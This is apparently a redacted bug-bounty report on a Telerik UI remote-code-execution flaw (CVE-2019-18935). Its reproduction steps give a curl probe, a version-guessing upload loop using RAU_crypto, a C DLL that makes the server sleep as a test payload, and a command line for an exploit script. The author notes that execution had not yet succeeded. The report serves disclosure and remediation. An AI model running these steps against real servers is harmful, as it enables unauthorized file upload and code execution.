Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)

**Description:** https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system. ## References https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui ## Impact An attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access. ## System Host(s) ████ ## Affected Product(s) and Version(s) Telerik UI Version ███ ## CVE Numbers CVE-2017-11317, CVE-2019-18935 ## Steps to Reproduce ## Verify the Upload Handler is Registered First, confirm the file upload handler is registered by issuing the following request: ```bash curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau ``` You should see the following response: ``` { "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." } ``` ## Version Identification Next, you will need to install `RAU_crypto` (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable versions until finding the correct version. After `RAU_crypto` has been installed, you can use the following script (with the attached _versions.txt_ file): ```bash echo 'test' > testfile.txt for VERSION in $(cat versions.txt); do echo -n "$VERSION: " python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo done ``` This uploads a file (in this case, `testfile.txt`) to the `█████` directory on the target server. The contents of my `testfile.txt` simply included the word "test". The script should eventually identify a vulnerable version (`████████`), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file: ```bash █████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ } ``` ## Compiling a Test Payload Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding: ```c #include <windows.h> #include <stdio.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason == DLL_PROCESS_ATTACH) Sleep(10000); // Time interval in milliseconds. return TRUE; } ``` As a .NET application will only load an assembly once with a given name, the dll from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused dll for testing purposes if desired (if not, just follow the steps from the link in the references section). ## Exploitation Now that we have our test payload ready, we can use the attached _CVE-2019-18935.py_ script to upload and execute the dll. ```bash python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll ``` > *Note: I'm having trouble getting the server to sleep with the crafted `.dll`. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can't get execution.* ## Suggested Mitigation/Remediation Actions Update TelerikUI to the latest (or a patched) version.